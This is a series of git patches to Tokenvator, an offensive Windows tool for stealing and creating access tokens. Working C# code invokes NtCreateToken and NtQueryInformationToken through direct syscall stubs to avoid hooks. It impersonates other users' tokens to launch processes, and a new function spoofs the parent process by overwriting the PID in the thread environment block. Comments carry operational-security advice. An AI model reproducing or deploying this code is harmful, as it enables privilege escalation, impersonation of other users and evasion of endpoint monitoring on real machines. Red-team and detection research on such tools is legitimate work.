+            // NtCreateToken(out phNewToken, Winnt.TOKEN_ALL_ACCESS, ref objectAttributes, Winnt._TOKEN_TYPE.TokenPrimary, ref systemLuid, ref expirationTime, ref tokenUser, ref tokenGroups, ref tokenPrivileges, ref tokenOwner, ref tokenPrimaryGroup, ref tokenDefaultDacl, ref tokenSource);
+            ////////////////////////////////////////////////////////////////////////////////
             IntPtr hNtCreateToken = Generic.GetSyscallStub("NtCreateToken");
             MonkeyWorks.ntdll.NtCreateToken fSyscallNtCreateToken = (MonkeyWorks.ntdll.NtCreateToken)Marshal.GetDelegateForFunctionPointer(hNtCreateToken, typeof(MonkeyWorks.ntdll.NtCreateToken));
 
@@ -377,21 +380,28 @@ public void CloneToken(int processId, string command)
                 IntPtr hNtCreateToken = Generic.GetSyscallStub("NtCreateToken");
                 MonkeyWorks.ntdll.NtCreateToken fSyscallNtCreateToken = (MonkeyWorks.ntdll.NtCreateToken)Marshal.GetDelegateForFunctionPointer(hNtCreateToken, typeof(MonkeyWorks.ntdll.NtCreateToken));
 
-                ntRetVal = fSyscallNtCreateToken(
-                    out phNewToken,
-                    Winnt.TOKEN_ALL_ACCESS,
-                    ref objectAttributes,
-                    Winnt._TOKEN_TYPE.TokenPrimary,
-                    ref systemLuid,
-                    ref expirationTime,
-                    ref ti.tokenUser,
-                    ref ti.tokenGroups,
-                    ref ti.tokenPrivileges,
-                    ref ti.tokenOwner,
-                    ref ti.tokenPrimaryGroup,
-                    ref ti.tokenDefaultDacl,
-                    ref ti.tokenSource
-                );
+                try
+                {
+                    ntRetVal = fSyscallNtCreateToken(
+                        out phNewToken,
+                        Winnt.TOKEN_ALL_ACCESS,
+                        ref objectAttributes,
+                        Winnt._TOKEN_TYPE.TokenPrimary,
+                        ref systemLuid,
+                        ref expirationTime,
+                        ref ti.tokenUser,
+                        ref ti.tokenGroups,
+                        ref ti.tokenPrivileges,
+                        ref ti.tokenOwner,
+                        ref ti.tokenPrimaryGroup,
+                        ref ti.tokenDefaultDacl,
+                        ref ti.tokenSource
+                    );
+                }
+                catch (Exception ex)
+                {
+                    Misc.GetExceptionMessage(ex, "NtCreateToken");
+                }
             }
 
             if (0 != ntRetVal)
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index eb97181..d67d061 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -83,39 +83,39 @@ public override void Dispose()
 
             if (IntPtr.Zero != hTokenSource)
             {
-                Marshal.FreeHGlobal(hTokenSource);
+                //Marshal.FreeHGlobal(hTokenSource);
             }
             if (IntPtr.Zero != hTokenUser)
             {
-                Marshal.FreeHGlobal(hTokenUser);
+                //Marshal.FreeHGlobal(hTokenUser);
             }
             if (IntPtr.Zero != hTokenGroups)
             {
-                Marshal.FreeHGlobal(hTokenGroups);
+                //Marshal.FreeHGlobal(hTokenGroups);
             }
             if (IntPtr.Zero != hTokenPrivileges)
             {
-                Marshal.FreeHGlobal(hTokenPrivileges);
+                //Marshal.FreeHGlobal(hTokenPrivileges);
             }
             if (IntPtr.Zero != hTokenOwner)
             {
-                Marshal.FreeHGlobal(hTokenOwner);
+                //Marshal.FreeHGlobal(hTokenOwner);
             }
             if (IntPtr.Zero != hTokenPrimaryGroup)
             {
-                Marshal.FreeHGlobal(hTokenPrimaryGroup);
+                //Marshal.FreeHGlobal(hTokenPrimaryGroup);
             }
             if (IntPtr.Zero != hTokenDefaultDacl)
             {
-                Marshal.FreeHGlobal(hTokenDefaultDacl);
+                //Marshal.FreeHGlobal(hTokenDefaultDacl);
             }
             if (IntPtr.Zero != hTokenElevationType)
             {
-                Marshal.FreeHGlobal(hTokenElevationType);
+                //Marshal.FreeHGlobal(hTokenElevationType);
             }
             if (IntPtr.Zero != hTokenType)
             {
-                Marshal.FreeHGlobal(hTokenType);
+                //Marshal.FreeHGlobal(hTokenType);
             }
 
             base.Dispose();
@@ -377,7 +377,6 @@ public bool GetTokenGroups()
             for (int i = 0; i < tokenGroups.GroupCount; i++)
             {
                 string sid, account;
-                sid = account = string.Empty;
                 ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
                 Console.WriteLine("{0,-50} {1}", sid, account);
             }
@@ -765,6 +764,7 @@ public bool CheckTokenPrivilege(string privilegeName)
             {
                 using(TokenManipulation tm = new TokenManipulation(hWorkingToken))
                 {
+                    tm.SetWorkingTokenToSelf();
                     if (!tm.SetTokenPrivilege(privilegeName, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
                     {
                         Console.WriteLine("[-] Unable to enable privilege {0}");
@@ -789,26 +789,35 @@ public bool CheckTokenPrivilege(string privilegeName)
         [HandleProcessCorruptedStateExceptions]
         private IntPtr _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS tokenInformationClass)
         {
-            MonkeyWorks.ntdll.NtQueryInformationToken fSyscallNtQueryInformationToken = (MonkeyWorks.ntdll.NtQueryInformationToken)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationToken, typeof(MonkeyWorks.ntdll.NtQueryInformationToken));
+            var fSyscallNtQueryInformationToken = (MonkeyWorks.ntdll.NtQueryInformationToken)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationToken, typeof(MonkeyWorks.ntdll.NtQueryInformationToken));
 
             IntPtr tokenInformation = IntPtr.Zero;
+            ulong returnLength = 0;
             try
             {
-                ulong returnLength = 0;
                 fSyscallNtQueryInformationToken(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, ref returnLength);
-                tokenInformation = Marshal.AllocHGlobal((int)returnLength);
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "NtQueryInformationToken");
+                return IntPtr.Zero;
+            }
+            tokenInformation = Marshal.AllocHGlobal((int)returnLength);
 
-                uint ntRetVal = fSyscallNtQueryInformationToken(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, ref returnLength);
-                if (0 != ntRetVal)
-                {
-                    Misc.GetNtError("NtQueryInformationToken", ntRetVal);
-                    return IntPtr.Zero;
-                }
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtQueryInformationToken(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, ref returnLength);
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "NtQueryInformationToken");
+                return IntPtr.Zero;
+            }
+
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtQueryInformationToken", ntRetVal);
                 return IntPtr.Zero;
             }
 
diff --git a/Tokenvator/Plugins/Enumeration/UserSessions.cs b/Tokenvator/Plugins/Enumeration/UserSessions.cs
index 1b4d205..5f9ea49 100644
--- a/Tokenvator/Plugins/Enumeration/UserSessions.cs
+++ b/Tokenvator/Plugins/Enumeration/UserSessions.cs
@@ -8,9 +8,6 @@
 using Tokenvator.Resources;
 using Tokenvator.Plugins.AccessTokens;
 
-//using MonkeyWorks.Unmanaged.Headers;
-//using MonkeyWorks.Unmanaged.Libraries;
-
 using DInvoke.DynamicInvoke;
 using System.Runtime.ExceptionServices;
 using System.Security;
@@ -23,6 +20,9 @@ sealed class UserSessions
     {
         ////////////////////////////////////////////////////////////////////////////////
         // Lists interactive user sessions
+        /// <summary>
+        /// 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
@@ -42,14 +42,13 @@ public static void EnumerateInteractiveUserSessions()
             ////////////////////////////////////////////////////////////////////////////////
             //wtsapi32.WTSEnumerateSessions(IntPtr.Zero, 0, 1, ref ppSessionInfo, ref pCount);
             ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hWTSEnumerateSessionsW = Generic.GetExportAddress(hwtsapi32, "WTSEnumerateSessionsW");
+            var fWTSEnumerateSessionsW = (MonkeyWorks.wtsapi32.WTSEnumerateSessionsW)Marshal.GetDelegateForFunctionPointer(hWTSEnumerateSessionsW, typeof(MonkeyWorks.wtsapi32.WTSEnumerateSessionsW));
 
             Dictionary<string, uint> users = new Dictionary<string, uint>();
             IntPtr ppSessionInfo = new IntPtr();
             uint pCount = 0;
-            
-            IntPtr hWTSEnumerateSessionsW = Generic.GetExportAddress(hwtsapi32, "WTSEnumerateSessionsW");
-            MonkeyWorks.wtsapi32.WTSEnumerateSessionsW fWTSEnumerateSessionsW = (MonkeyWorks.wtsapi32.WTSEnumerateSessionsW)Marshal.GetDelegateForFunctionPointer(hWTSEnumerateSessionsW, typeof(MonkeyWorks.wtsapi32.WTSEnumerateSessionsW));
-            
+                        
             bool retVal = false;
             try
             {
@@ -264,11 +263,15 @@ internal static void Tasklist()
         public static Dictionary<string, uint> EnumerateTokens(bool findElevation)
         {
             Dictionary<string, uint> users = new Dictionary<string, uint>();
-            foreach (Process p in Process.GetProcesses())
+            using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
             {
-                using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
+                foreach (Process p in Process.GetProcesses())
                 {
-                    ti.OpenProcessToken(p.Id);
+                
+                    if (!ti.OpenProcessToken(p.Id, false))
+                    {
+                        continue;
+                    }
                     ti.SetWorkingTokenToRemote();
                     ti.GetTokenElevation(false);
                     if (findElevation)
diff --git a/Tokenvator/Plugins/Execution/CreateProcess.cs b/Tokenvator/Plugins/Execution/CreateProcess.cs
index 3707b0d..2b31e32 100644
--- a/Tokenvator/Plugins/Execution/CreateProcess.cs
+++ b/Tokenvator/Plugins/Execution/CreateProcess.cs
@@ -30,37 +30,18 @@ static class CreateProcess
         [HandleProcessCorruptedStateExceptions]
         public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, string arguments)
         {
-            ////////////////////////////////////////////////////////////////////////////////
-            // advapi32.ImpersonateLoggedOnUser(phNewToken)
-            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
             IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr hImpersonateLoggedOnUser = Generic.GetExportAddress(hadvapi32, "ImpersonateLoggedOnUser");
-            MonkeyWorks.advapi32.ImpersonateLoggedOnUser fImpersonateLoggedOnUser = (MonkeyWorks.advapi32.ImpersonateLoggedOnUser)Marshal.GetDelegateForFunctionPointer(hImpersonateLoggedOnUser, typeof(MonkeyWorks.advapi32.ImpersonateLoggedOnUser));
 
-            bool retVal = false;
-            try
-            {
-                retVal = fImpersonateLoggedOnUser(phNewToken);
-            }
-            catch (Exception ex)
-            {
-                Misc.GetExceptionMessage(ex, "ImpersonateLoggedOnUser");
-                return false;
-            }
-
-
-            if (IntPtr.Zero != phNewToken && !retVal)
-            {
-                Misc.GetWin32Error("ImpersonateLoggedOnUser");
-                return false;
-            }
+            IntPtr hImpersonateLoggedOnUser = Generic.GetExportAddress(hadvapi32, "ImpersonateLoggedOnUser");
+            var fImpersonateLoggedOnUser = (MonkeyWorks.advapi32.ImpersonateLoggedOnUser)Marshal.GetDelegateForFunctionPointer(hImpersonateLoggedOnUser, typeof(MonkeyWorks.advapi32.ImpersonateLoggedOnUser));
 
-            ////////////////////////////////////////////////////////////////////////////////
-            // advapi32.RevertToSelf();
-            ////////////////////////////////////////////////////////////////////////////////
             IntPtr hRevertToSelf = Generic.GetExportAddress(hadvapi32, "RevertToSelf");
-            MonkeyWorks.advapi32.RevertToSelf fRevertToSelf = (MonkeyWorks.advapi32.RevertToSelf)Marshal.GetDelegateForFunctionPointer(hRevertToSelf, typeof(MonkeyWorks.advapi32.RevertToSelf));
+            var fRevertToSelf = (MonkeyWorks.advapi32.RevertToSelf)Marshal.GetDelegateForFunctionPointer(hRevertToSelf, typeof(MonkeyWorks.advapi32.RevertToSelf));
 
+            IntPtr hCreateProcessWithLogonW = Generic.GetExportAddress(hadvapi32, "CreateProcessWithLogonW");
+            var fCreateProcessWithLogonW = (MonkeyWorks.advapi32.CreateProcessWithLogonW)Marshal.GetDelegateForFunctionPointer(hCreateProcessWithLogonW, typeof(MonkeyWorks.advapi32.CreateProcessWithLogonW));
+            
             if (name.Contains("\\"))
             {
                 name = System.IO.Path.GetFullPath(name);
@@ -98,11 +79,29 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
                 }
             }
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.ImpersonateLoggedOnUser(phNewToken)
+            ////////////////////////////////////////////////////////////////////////////////
+            bool retVal = false;
+            try
+            {
+                retVal = fImpersonateLoggedOnUser(phNewToken);
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "ImpersonateLoggedOnUser");
+                return false;
+            }
+
+            if (IntPtr.Zero != phNewToken && !retVal)
+            {
+                Misc.GetWin32Error("ImpersonateLoggedOnUser");
+                return false;
+            }
+
             ////////////////////////////////////////////////////////////////////////////////
             // advapi32.CreateProcessWithLogonW("i","j","k", Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY, name, name, Winbase.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE, IntPtr.Zero, Environment.CurrentDirectory, ref startupInfo, out processInformation)
             ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hCreateProcessWithLogonW = Generic.GetExportAddress(hadvapi32, "CreateProcessWithLogonW");
-            MonkeyWorks.advapi32.CreateProcessWithLogonW fCreateProcessWithLogonW = (MonkeyWorks.advapi32.CreateProcessWithLogonW)Marshal.GetDelegateForFunctionPointer(hCreateProcessWithLogonW, typeof(MonkeyWorks.advapi32.CreateProcessWithLogonW));
 
             Console.WriteLine("[*] CreateProcessWithLogonW");
             Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO
@@ -115,7 +114,9 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
             try
             {
                 retVal = fCreateProcessWithLogonW(
-                string.Empty, string.Empty, string.Empty,
+                //OpSec warning, change these
+                //This used to work with string.empty, another MS silent patch
+                "tv", "tv", "tv",
                 Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
                 name,
                 name,
@@ -148,7 +149,10 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
             
             Console.WriteLine(" [+] Created process: {0}", processInformation.dwProcessId);
             Console.WriteLine(" [+] Created thread:  {0}", processInformation.dwThreadId);
-            Misc.GetWin32Error("CreateProcessWithLogonW");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.RevertToSelf();
+            ////////////////////////////////////////////////////////////////////////////////
             try
             {
                 fRevertToSelf();
@@ -175,7 +179,9 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
         [HandleProcessCorruptedStateExceptions]
         public static bool CreateProcessWithLogonW(string username, string domain, string password, string command, string arguments)
         {
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
             IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
             IntPtr hCreateProcessWithLogonW = Generic.GetExportAddress(hadvapi32, "CreateProcessWithLogonW");
             MonkeyWorks.advapi32.CreateProcessWithLogonW fCreateProcessWithLogonW = (MonkeyWorks.advapi32.CreateProcessWithLogonW)Marshal.GetDelegateForFunctionPointer(hCreateProcessWithLogonW, typeof(MonkeyWorks.advapi32.CreateProcessWithLogonW));
 
@@ -280,7 +286,7 @@ out processInformation
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                Console.WriteLine("[-] CreateProcessWithTokenW Generated an Exception");
                 Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
@@ -304,6 +310,73 @@ out processInformation
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// https://gist.github.com/tyranid/abad5008f5768b7718cd11d1a76a3763
+        /// https://en.wikipedia.org/wiki/Win32_Thread_Information_Block
+        /// </summary>
+        /// <param name="parent"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        public static bool SpoofParentProcess(uint parent, out uint previousPid)
+        {
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+
+            IntPtr hGetCurrentProcessId = Generic.GetExportAddress(hkernel32, "GetCurrentProcessId");
+            var fGetCurrentProcessId = (MonkeyWorks.kernel32.GetCurrentProcessId)Marshal.GetDelegateForFunctionPointer(hGetCurrentProcessId, typeof(MonkeyWorks.kernel32.GetCurrentProcessId));
+
+            IntPtr hNtQueryInformationThread = Generic.GetSyscallStub("NtQueryInformationThread");
+            var fSyscallNtQueryInformationThread = (MonkeyWorks.ntdll.NtQueryInformationThread)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationThread, typeof(MonkeyWorks.ntdll.NtQueryInformationThread));
+
+            IntPtr hGetCurrentThread = Generic.GetExportAddress(hkernel32, "GetCurrentThread");
+            var fGetCurrentThread = (MonkeyWorks.kernel32.GetCurrentThread)Marshal.GetDelegateForFunctionPointer(hGetCurrentThread, typeof(MonkeyWorks.kernel32.GetCurrentThread));
+
+            previousPid = fGetCurrentProcessId();
+
+            uint threadInformationLength = (uint)Marshal.SizeOf(typeof(MonkeyWorks.ntdll._THREAD_BASIC_INFORMATION));
+            IntPtr threadInformation = Marshal.AllocHGlobal((int)threadInformationLength);
+
+            MonkeyWorks.ntdll._THREAD_BASIC_INFORMATION threadBasicInformation;
+
+            uint returnLength = 0;
+            uint ntRetVal;
+            try
+            {
+                ntRetVal = fSyscallNtQueryInformationThread(
+                    fGetCurrentThread(), 
+                    MonkeyWorks.ntdll._THREAD_INFORMATION_CLASS.ThreadBasicInformation, 
+                    threadInformation, 
+                    threadInformationLength, 
+                    ref returnLength
+                );
+                threadBasicInformation = (MonkeyWorks.ntdll._THREAD_BASIC_INFORMATION)Marshal.PtrToStructure(threadInformation, typeof(MonkeyWorks.ntdll._THREAD_BASIC_INFORMATION));
+                //Misc.PrintStruct(threadBasicInformation);
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "NtQueryInformationThread");
+                return false;
+            }
+            finally
+            {
+                Marshal.FreeHGlobal(threadInformation);
+            }
+
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtQueryInformationThread", ntRetVal);
+                return false;
+            }
+
+            Console.WriteLine("[*] Modifying TEB");
+            IntPtr hPid = new IntPtr(threadBasicInformation.TebBaseAddress.ToInt64() + 0x40);
+            previousPid = (uint)Marshal.ReadInt32(hPid);
+            Console.Write("[*] Current PID: {0}, ", previousPid);
+            Marshal.WriteInt32(hPid, (int)parent);
+            Console.WriteLine("Updated PID: {0}", parent);
+            return true;
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Returns the full path to an executable specified by just its name
diff --git a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
index b176dd2..49c47ef 100644
--- a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
+++ b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
@@ -29,7 +29,10 @@ class NamedPipes : IDisposable
 
         private delegate bool Create(IntPtr phNewToken, string newProcess, string arguments);
 
+#pragma warning disable IDE0052 
         private Winnt._TOKEN_TYPE tokenType;
+#pragma warning restore IDE0052
+
         private readonly AccessTokens.AccessTokens accessTokens;
 
         ////////////////////////////////////////////////////////////////////////////////
diff --git a/Tokenvator/Resources/CommandLineParsing.cs b/Tokenvator/Resources/CommandLineParsing.cs
index b422c98..453a7a8 100644
--- a/Tokenvator/Resources/CommandLineParsing.cs
+++ b/Tokenvator/Resources/CommandLineParsing.cs
@@ -21,6 +21,7 @@ public sealed class CommandLineParsing
         public string PipeName { get; private set; }
         public bool Impersonation { get; private set; }
         public bool Legacy { get; private set; }
+        public uint PPID { get; private set; }
 
         public static List<string> Privileges = new List<string> { "SeAssignPrimaryTokenPrivilege",
             "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege",
@@ -42,6 +43,7 @@ public CommandLineParsing()
             Remote = false;
             Impersonation = false;
             Legacy = false;
+            PPID = 0;
         }
 
         /// <summary>
@@ -184,15 +186,29 @@ public bool Parse(string input)
                 }
             }
 
+            if (arguments.ContainsKey("ppid"))
+            {
+                object oppid;
+                if (arguments.TryGetValue("ppid", out oppid))
+                {
+                    uint uppid;
+                    if (uint.TryParse((string)oppid, out uppid))
+                    {
+                        PPID = uppid;
+                    }
+                }
+            }
+
             return true;
         }
-
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// 
         /// </summary>
         /// <param name="input"></param>
         /// <param name="output"></param>
         /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         public bool GetData<T>(string input, out T output)
         {
             object obj;
@@ -201,12 +217,14 @@ public bool GetData<T>(string input, out T output)
             return retVal;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// 
         /// </summary>
         /// <param name="input"></param>
         /// <param name="command"></param>
         /// <param name="arguments"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         private static void _ParseCommand(string input, out string command, out string arguments)
         {
             string[] cmdAndArgs = input.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
@@ -219,12 +237,14 @@ private static void _ParseCommand(string input, out string command, out string a
             arguments = string.Join(" ", cmdAndArgs.Skip(1).Take(cmdAndArgs.Count() - 1).ToArray());
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// 
         /// </summary>
         /// <param name="input"></param>
         /// <param name="output"></param>
         /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         private static bool _ParseProcessID(string input, out int output)
         {
             if (int.TryParse(input, out output))
@@ -273,14 +293,16 @@ private static bool _ParseProcessID(string input, out int output)
 
             Console.WriteLine("[-] Unable to Parse Process ID with Data {0}", input);
             return false;
-        }      
+        }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// 
         /// </summary>
         /// <param name="input"></param>
         /// <param name="output"></param>
         /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         private static bool _ParsePrivileges(string input, out string output)
         {
             //privileges.Any(s => s.Equals(input, StringComparison.OrdinalIgnoreCase))
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index 30b6e3c..a264b7c 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -134,6 +134,7 @@
     </Reference>
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="MainLoop.Extentions.cs" />
     <Compile Include="Plugins\AccessTokens\AccessTokens.cs" />
     <Compile Include="Plugins\AccessTokens\CreateTokens.cs" />
     <Compile Include="Plugins\Execution\CreateProcess.cs" />

From fd44873e72e197ae180b5e79e75c78824e5b0a72 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 08:59:09 -0500
Subject: [PATCH 24/36] Updating Monkeyworks

---
 Tokenvator/Resources/MonkeyWorks | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Tokenvator/Resources/MonkeyWorks b/Tokenvator/Resources/MonkeyWorks
index 2ada0a7..42bb7c2 160000
--- a/Tokenvator/Resources/MonkeyWorks
+++ b/Tokenvator/Resources/MonkeyWorks
@@ -1 +1 @@
-Subproject commit 2ada0a7438600fc5fc1b1bef17fa18bd606f460b
+Subproject commit 42bb7c2f05e686a1693d70b04b7433c7281afaf2

From bbc44ac108ae7609672cf13d191c97e158121633 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 09:02:04 -0500
Subject: [PATCH 25/36] Adding DInvoke Dev

---
 Tokenvator/Resources/DInvoke | 1 +
 1 file changed, 1 insertion(+)
 create mode 160000 Tokenvator/Resources/DInvoke

diff --git a/Tokenvator/Resources/DInvoke b/Tokenvator/Resources/DInvoke
new file mode 160000
index 0000000..ee256ba
--- /dev/null
+++ b/Tokenvator/Resources/DInvoke
@@ -0,0 +1 @@
+Subproject commit ee256ba5a56cd45e813eb9eb007205090538d55d

From 4a7514ff12a6c91406d9c34bb5653ce0b2a41d68 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 09:06:35 -0500
Subject: [PATCH 26/36] Updating DInvoke to latest

---
 Tokenvator/Resources/DInvoke | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Tokenvator/Resources/DInvoke b/Tokenvator/Resources/DInvoke
index ee256ba..0530886 160000
--- a/Tokenvator/Resources/DInvoke
+++ b/Tokenvator/Resources/DInvoke
@@ -1 +1 @@
-Subproject commit ee256ba5a56cd45e813eb9eb007205090538d55d
+Subproject commit 0530886deebd1a2e5bd8b9eb8e1d8ce87f4ca5e4

From 2ad3ac0257f894fb09271ca40766027b1ebf8bb6 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 09:10:18 -0500
Subject: [PATCH 27/36] Fixing DInvoke Submodule

---
 .gitmodules | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/.gitmodules b/.gitmodules
index f80315d..3bc3dce 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -2,3 +2,7 @@
 	path = Tokenvator/Resources/MonkeyWorks
 	url = https://github.com/0xbadjuju/MonkeyWorks.git
 	branch = master
+[submodule "Tokenvator/DInvoke"]
+	path = Tokenvator/Resources/DInvoke
+	url = https://github.com/TheWover/DInvoke.git
+	branch = dev

From 5892feaeebdd959cb4c585815cb440ee32d90e3b Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 09:18:23 -0500
Subject: [PATCH 28/36] Need to fork DInvoke for C# 5 compatibility

---
 .gitmodules | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.gitmodules b/.gitmodules
index 3bc3dce..4dd55c7 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -4,5 +4,5 @@
 	branch = master
 [submodule "Tokenvator/DInvoke"]
 	path = Tokenvator/Resources/DInvoke
-	url = https://github.com/TheWover/DInvoke.git
+	url = https://github.com/0xbadjuju/DInvoke.git
 	branch = dev

From d81529a66e40c26702352e7a0ad118f13ae6bedb Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 09:31:36 -0500
Subject: [PATCH 29/36] Updating for compatible version of DInvoke

---
 Tokenvator/Resources/DInvoke | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Tokenvator/Resources/DInvoke b/Tokenvator/Resources/DInvoke
index 0530886..3364112 160000
--- a/Tokenvator/Resources/DInvoke
+++ b/Tokenvator/Resources/DInvoke
@@ -1 +1 @@
-Subproject commit 0530886deebd1a2e5bd8b9eb8e1d8ce87f4ca5e4
+Subproject commit 3364112f33e0f5eb5d85434e9ed3744bb4933c73

From e90cb64b9cd7626ba6b1ad31e5e9a691d7e2f506 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 09:37:15 -0500
Subject: [PATCH 30/36] Update DInvoke again

---
 Tokenvator/Resources/DInvoke | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Tokenvator/Resources/DInvoke b/Tokenvator/Resources/DInvoke
index 3364112..3eed4db 160000
--- a/Tokenvator/Resources/DInvoke
+++ b/Tokenvator/Resources/DInvoke
@@ -1 +1 @@
-Subproject commit 3364112f33e0f5eb5d85434e9ed3744bb4933c73
+Subproject commit 3eed4dbae6e025ae392cb1eee7c0d9399d28ea7a

From c168cd8262cc9e3d4f7041b576f7f1e5c5d09652 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 10:22:51 -0500
Subject: [PATCH 31/36] Add PPID Tab Complete and Check for Admin Priv

---
 Tokenvator/Plugins/AccessTokens/AccessTokens.cs | 3 ++-
 Tokenvator/Resources/TabComplete.cs             | 2 +-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 9f995ea..eed701d 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -523,12 +523,13 @@ public bool OpenThreadToken(uint threadId, uint permissions)
         public bool StartProcessAsUser(string newProcess)
         {
             Create createProcess;
-            if (0 == Process.GetCurrentProcess().SessionId)
+            if (0 == Process.GetCurrentProcess().SessionId || WindowsIdentity.GetCurrent().Owner == WindowsIdentity.GetCurrent().User)
             {
                 createProcess = CreateProcess.CreateProcessWithLogonW;
             }
             else
             {
+                //This seems to require Admin privileges
                 createProcess = CreateProcess.CreateProcessWithTokenW;
             }
 
diff --git a/Tokenvator/Resources/TabComplete.cs b/Tokenvator/Resources/TabComplete.cs
index 8004ff9..cd00031 100644
--- a/Tokenvator/Resources/TabComplete.cs
+++ b/Tokenvator/Resources/TabComplete.cs
@@ -25,7 +25,7 @@ class TabComplete
 
         private readonly List<string> flags = new List<string>()
         { 
-            "All", "Command", "Filter", "Force", "Groups", "Impersonation", "Legacy", "Password", "Path", "Privilege", "Process", "ServiceName", "State", "Thread", "Username"        
